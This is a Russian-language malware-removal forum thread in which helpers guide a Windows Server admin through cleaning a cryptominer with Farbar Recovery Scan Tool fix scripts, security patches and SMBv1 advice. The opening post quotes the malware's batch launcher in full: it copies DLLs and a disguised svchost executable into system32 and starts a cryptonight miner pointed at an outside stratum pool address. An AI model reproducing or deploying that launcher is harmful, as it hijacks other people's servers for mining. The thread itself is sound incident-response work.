TR/BitCoinMiner.Gen

Добрый день. На сервере с ОС Windows Server 2008 R2 наблюдается загрузка ЦП до 75% процессом svchost.exe. Удалось выяснить, что запуск процесса происходит автоматически при помощи планировщика заданий. Запускается файл tmpDEAD.bat следующего содержания.[QUOTE]chcp 1251
IF NOT EXIST c:\windows\system32\libcurl.dll (copy c:\windows\temp\libcurl.dll c:\windows\system32\libcurl.dll)
IF NOT EXIST c:\windows\system32\libeay32.dll (copy c:\windows\temp\libeay32.dll c:\windows\system32\libeay32.dll)
IF NOT EXIST c:\windows\system32\libgcc_s_seh-1.dll (copy c:\windows\temp\libgcc_s_seh-1.dll c:\windows\system32\libgcc_s_seh-1.dll)
IF NOT EXIST c:\windows\system32\libstdc++-6.dll (copy c:\windows\temp\libstdc++-6.dll c:\windows\system32\libstdc++-6.dll)
IF NOT EXIST c:\windows\system32\libwinpthread-1.dll (copy c:\windows\temp\libwinpthread-1.dll c:\windows\system32\libwinpthread-1.dll)
IF NOT EXIST c:\windows\system32\ssleay32.dll (copy c:\windows\temp\ssleay32.dll c:\windows\system32\ssleay32.dll)
IF NOT EXIST c:\windows\system32\zlib1.dll (copy c:\windows\temp\zlib1.dll c:\windows\system32\zlib1.dll)
IF NOT EXIST c:\windows\system32\svchоst.exe (copy c:\windows\temp\svchоst.exe c:\windows\system32\svchоst.exe)
c:\windows\system32\svchоst.exe -u %1 -t %2 -a cryptonight -o stratum+tcp://185.86.150.41:8080[/QUOTE]
После отключения задания в планировщике и удаления файлов через некоторое время ситуация повторяется. Также было замечено, что появилась новая учетная запись с правами администратора "Gama". Логи были сняты после завершения процесса svchost и удаления файлов. На сервере стоит NOD32, который на угрозу никак не реагирует. На другом компьютере Avira определила файл svchost.exe как троян TR/BitCoinMiner.Gen. Прошу вашей помощи.

Уважаемый(ая) [B]cas1k[/B], спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Устраняйте уязвимость, которую используют в т. ч. нашумевшие шифровальщики WannaCry и Petya:
[url]http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212[/url]
[url]http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598[/url]
срочно устанавливайте, причём на всех компьютерах в сети, иначе не избавитесь от заразы. А лучше установите все доступные обновления безопасности.

Если компьютеров под XP нет - [URL="https://support.microsoft.com/ru-ru/help/2696547/how-to-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and-windows"]отключите протокол SMB версии 1[/URL].

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

Установил обновление системы безопасности для ОС Windows (KB4012212) пока что только на сервере. Отключил SMB при помощи добавления записи в реестр. Прикрепляю архив с отчетами Farbar Recovery Scan Tool.

Запустите FRST/FRST64. В окне программы нажмите комбинацию Ctrl+Y - откроется Блокнот. Скопируйте в него следующий код:[CODE]File: C:\Windows\system32\svchоst.exe
2017-11-10 20:59 - 2017-10-09 20:36 - 001447424 _____ (The OpenSSL Project, hxxp://www.openssl.org/) C:\Windows\system32\libeay32.dll
2017-11-10 20:59 - 2017-10-09 20:36 - 001185271 _____ C:\Windows\system32\svchоst.exe
2017-11-10 20:59 - 2017-10-09 20:36 - 000572416 _____ (The cURL library, hxxp://curl.haxx.se/) C:\Windows\system32\libcurl.dll
2017-11-10 20:59 - 2017-10-09 20:36 - 000314880 _____ (The OpenSSL Project, hxxp://www.openssl.org/) C:\Windows\system32\ssleay32.dll
2017-11-10 20:59 - 2017-10-09 20:36 - 000089600 _____ C:\Windows\system32\zlib1.dll
2017-11-10 20:59 - 2017-10-09 20:36 - 000079637 _____ (MingW-W64 Project. All rights reserved.) C:\Windows\system32\libwinpthread-1.dll
2017-11-10 20:59 - 2017-10-09 20:36 - 000075264 _____ C:\Windows\system32\libgcc_s_seh-1.dll
2017-10-26 15:25 - 2017-10-26 15:25 - 001016795 _____ C:\Users\Миша\Downloads\Не подтвержден 571670.crdownload
2017-11-08 17:32 - 2014-01-21 18:17 - 000157952 _____ () C:\Users\Администратор\AppData\Local\Temp\UninstallSer.exe
FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC] => (Allow) %systemroot%\system32\scshost.exe
FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC-EndPointMapper] => (Allow) %systemroot%\system32\scshost.exe[/CODE]
Сохраните (Ctrl+S) и закройте.
Отключите временно антивирус, в FRST нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.

Лог прикреплен к сообщению.

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:[CODE]File: C:\Windows\system32\svchоst.exe
2017-11-10 20:59 - 2017-10-09 20:36 - 001185271 _____ C:\Windows\system32\svchоst.exe
2017-11-08 17:32 - 2014-01-21 18:17 - 000157952 _____ () C:\Users\Администратор\AppData\Local\Temp\UninstallSer.exe[/CODE]
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. [U]При сохранении выберите кодировку [B]Юникод[/B]![/U]!
В FRST нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.

И следите, не появится ли майнер снова. У учётки Программист смените для профлактики пароль на сложный.

Лог прикреплен к сообщению. Майнер не появлялся, пока что все хорошо. Единственное, что насторожило, с 18 до 22 часов в журнале безопасности было зарегистрировано множество сообщений с кодом 4625. Предположительно брутфорс, причем имена учеток менялись с каждой попыткой (ИГОРЬ, ANDREI, HELEN и т.д.). Атака закончилась после перезагрузки сервера. Это последствия заражения или уже совсем другая песня?
[SPOILER]Учетной записи не удалось выполнить вход в систему.

Субъект:
ИД безопасности: NULL SID
Имя учетной записи: -
Домен учетной записи: -
Код входа: 0x0

Тип входа: 3

Учетная запись, которой не удалось выполнить вход:
ИД безопасности: NULL SID
Имя учетной записи: ИГОРЬ
Домен учетной записи:

Сведения об ошибке:
Причина ошибки: Неизвестное имя пользователя или неверный пароль.
Состояние: 0xc000006d
Подсостояние: 0xc0000064

Сведения о процессе:
Идентификатор процесса вызывающей стороны: 0x0
Имя процесса вызывающей стороны: -

Сведения о сети:
Имя рабочей станции:
Сетевой адрес источника: -
Порт источника: -

Сведения о проверке подлинности:
Процесс входа: NtLmSsp
Пакет проверки подлинности: NTLM
Промежуточные службы: -
Имя пакета (только NTLM): -
Длина ключа: 0

Данное событие возникает при неудачной попытке входа. Оно регистрируется на компьютере, попытка доступа к которому была выполнена.

Поля "Субъект" указывают на учетную запись локальной системы, запросившую вход. Обычно это служба, например, служба "Сервер", или локальный процесс, такой как Winlogon.exe или Services.exe.

В поле "Тип входа" указан тип выполненного входа. Наиболее распространенными являются типы 2 (интерактивный) и 3 (сетевой).

В полях "Сведения о процессе" указано, какая учетная запись и процесс в системе выполнили запрос на вход.

Поля "Сведения о сети" указывают на источник запроса на удаленный вход. Имя рабочей станции доступно не всегда, и в некоторых случаях это поле может оставаться незаполненным.

Поля сведений о проверке подлинности содержат подробные данные о конкретном запросе на вход.
- В поле "Промежуточные службы" указано, какие промежуточные службы участвовали в данном запросе на вход.
- Поле "Имя пакета" указывает на подпротокол, использованный с протоколами NTLM.
- Поле "Длина ключа" содержит длину созданного ключа сеанса. Это поле может иметь значение "0", если ключ сеанса не запрашивался.[/SPOILER]

Систему не заражают, а взламывают.
Делайте уже свою админскую работу. Почитайте, как настроить файрволл, защититься от брутфорса. Здесь не курсы молодого сисадмина.

Вадим, спасибо большое за помощь! Загвоздка в том, что я программист, а не сисадмин. Что ж, будем повышать компетенцию.

Удалите папку C:\FRST со всем содержимым.

Выполните [url="http://virusinfo.info/showthread.php?t=121902"]рекомендации после лечения[/url].